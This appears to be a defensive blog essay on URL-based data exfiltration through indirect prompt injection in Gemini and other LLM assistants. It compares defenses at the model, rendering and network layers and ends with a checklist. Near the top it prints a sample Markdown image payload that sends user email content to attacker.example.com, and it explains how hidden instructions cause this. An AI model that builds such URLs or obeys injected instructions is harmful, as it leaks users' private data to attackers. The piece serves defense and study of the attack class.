· 6 min read ·

Why Fixing URL Exfiltration in LLMs Requires Defense at Every Layer

Source: lobsters

Google’s BugHunters blog post on mitigating URL-based exfiltration in Gemini is a useful artifact, not because the attack is novel, but because it forces a clear accounting of where the defenses actually live. Prompt injection and data exfiltration via embedded URLs have been documented across AI assistants since at least 2023, when researcher Johann Rehberger demonstrated the technique against Bing Chat. Google publishing their mitigation strategy for Gemini gives the ecosystem something concrete to compare against, and the picture it reveals is that there is no tidy fix.

The Attack in Concrete Terms

The URL-based exfiltration chain requires three things to succeed: an LLM processing untrusted content, an instruction in that content directing the model to construct a URL encoding sensitive context data, and a rendering environment that auto-fetches the resulting URL.

The canonical payload looks like this:

![exfil](https://attacker.example.com/collect?data=USER_EMAIL_CONTENT_HERE)

When this appears in a model’s response and a Markdown renderer processes it as an image tag, the HTTP client fires a GET request automatically. No user click required. The data is in transit before anything visible happens. The injected instruction that produced this URL can be completely invisible to the user: white text on a white background in a document, an HTML comment in a webpage, metadata in a file the LLM processed during a summarization task.

This is the indirect prompt injection model described in Greshake et al.’s 2023 paper “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications”, which remains the foundational treatment of the attack class. The paper demonstrated successful attacks against early Bing Chat integrations and GPT-4 agents, including scenarios where email-reading agents forwarded sensitive messages silently and memory stores were poisoned for cross-session persistence.

Gemini’s integration with Google Workspace raises the stakes considerably. A model with access to a user’s email, calendar, and documents during a session has a much richer pool of extractable data than a standalone chatbot. The attack surface is larger and the potential consequences of a successful exfiltration are more significant.

Three Places to Mount a Defense, None of Them Sufficient Alone

The reason Google’s writeup is worth studying is that it makes the multi-layer nature of the problem explicit. There are three distinct places where a mitigation can sit, each with its own limitations.

At the model layer, you train or fine-tune the model to refuse instructions that ask it to construct URLs containing conversation data. Google has done this for Gemini. The limitation is that adversarial instructions can be obfuscated in ways the model doesn’t recognize. Jailbreak research has catalogued a long list of techniques: base64 encoding instructions, splitting a malicious command across multiple turns, embedding instructions in formats the model reads differently than humans do. Model-level refusals improve with training data diversity, but they are not a closed problem. The InjecAgent benchmark, which tested 1,054 indirect injection scenarios across production models without additional defenses, found attack success rates around 24% against GPT-4-turbo and 18% against Claude 3 Opus. Those numbers matter because each success can mean an outbound HTTP request with sensitive data in the query string.

At the rendering layer, you strip or sandbox image tags in model output so the auto-fetch side effect never fires. This is effective for controlled surfaces: Google’s own Gemini UI, a first-party mobile app, a tightly managed enterprise deployment. It is not effective for API consumers building their own interfaces who render raw model output. The Gemini API is a public surface. A developer building a Workspace integration who passes model responses through a Markdown renderer without sanitization has reintroduced the vulnerability even if every Google-controlled surface is clean. You cannot train your way out of a rendering bug that lives in a third-party client.

At the network layer, you add controls on what outbound requests the client can make: Content Security Policy headers that block cross-origin image loads, a proxy that validates outbound requests against an allowlist, egress filtering at the infrastructure level. This is the most reliable layer if you control the environment, and the least reliable layer if you don’t. CSP helps in browser-based clients; it does nothing for a server-side agent that processes model output and makes network calls on its own.

Google’s approach combines all three. That is the right call. A mitigation that lives only at one layer will be bypassed at one of the others.

What Other Defenders Are Doing

The broader ecosystem has developed several approaches worth comparing.

Microsoft’s Spotlighting technique wraps retrieved external content in structural delimiters before it enters the model’s context, making the boundary between trusted instructions and untrusted data syntactically explicit. The variants include delimiter-only wrapping, datamarking (applying a distinguishing prefix to every sentence of untrusted content), and sandwiching (surrounding untrusted content with instruction reminders). Tested against GPT-4, the technique achieved roughly a 95% reduction in successful attacks with a 1-3% accuracy drop on benign tasks. It is cheap to implement and available commercially as Microsoft Prompt Shield via Azure AI Studio.

OpenAI’s Instruction Hierarchy takes a model-training approach: establish a formal privilege ordering where system prompt instructions outrank user message instructions, which outrank tool and environment content. The model is trained to resist lower-privilege channels trying to override higher-privilege ones. This is conceptually clean but faces the same adversarial robustness challenge as other model-layer defenses.

Simon Willison’s Dual LLM Pattern is an architectural approach. A privileged model has tool access and only ever receives trusted input. A quarantined model handles untrusted external content but has no tool access and can only return structured summaries to the privileged model. Injected instructions in the untrusted content cannot directly reach the model with the ability to act on them; there is a two-hop requirement that raises the cost of a successful attack substantially. The pattern is not widely implemented in production frameworks yet, but it is the most principled architectural defense available.

For teams building on open-source tooling, NVIDIA’s Garak is a vulnerability scanner for LLMs that can probe for prompt injection susceptibility, and Rebuff from ProtectAI combines heuristic pattern matching with vector similarity against known attack embeddings.

What Agentic Systems Change

The URL exfiltration attack as traditionally described assumes a rendering environment that auto-fetches image URLs. Agentic systems remove that assumption. An agent with HTTP tool access that follows an injected instruction does not need to produce a Markdown image tag and wait for a renderer. It calls the HTTP tool directly. The exfiltration URL is fetched by the agent itself, not by a browser rendering its output.

This matters because agent frameworks are proliferating and tool access is the point. LangGraph, AutoGen, and OpenAI Assistants all provide mechanisms for giving models web access, and each HTTP-capable tool becomes a potential exfiltration channel. In a multi-agent pipeline where each agent has an 18% per-hop failure rate against injected instructions, a three-hop chain gives attackers a cumulative ~45% probability of reaching the orchestrator with a successful instruction. No production framework currently implements output provenance tracking, which would let a downstream agent know whether its input was shaped by untrusted content.

The defensive principle for agentic systems is to apply minimum necessary permissions. An agent that only needs to read files does not need HTTP access. An agent that needs to fetch one specific type of URL does not need arbitrary outbound access. Restricting tool permissions reduces the blast radius even when model-layer defenses fail.

The Practical Checklist for API Consumers

If you are building on Gemini, GPT-4, or any LLM that processes external content and generates output that gets rendered:

  • Treat model output as untrusted HTML in browser contexts. Use a Markdown renderer with image tag sanitization or apply a CSP that blocks cross-origin image requests. Do not pass raw model responses into innerHTML.
  • Do not assume the model will reliably refuse adversarial instructions in documents or URLs your application processes. Prompt injection is not closed at the model layer.
  • Minimize context. Data that is not in the prompt cannot be exfiltrated. If the model does not need access to the user’s full email history to complete the task, do not include it.
  • For agents with tool access, apply least-privilege permissions and add human confirmation gates before irreversible or outbound-network actions.
  • Use explicit system prompt framing: content retrieved from external sources is data to process, not instructions to follow. This is imperfect but measurably reduces attack success rates.

The OWASP LLM Top 10 puts prompt injection at the top of the list for exactly these reasons. The attacks are not individually sophisticated. The attack surface is just broad, the defenses are imperfect at every layer, and the consequences of a successful exfiltration against a model with Workspace-level access are real. Google writing up their mitigations in detail is useful for the whole ecosystem, and the most important thing it communicates is that defense in depth is not optional.

Was this interesting?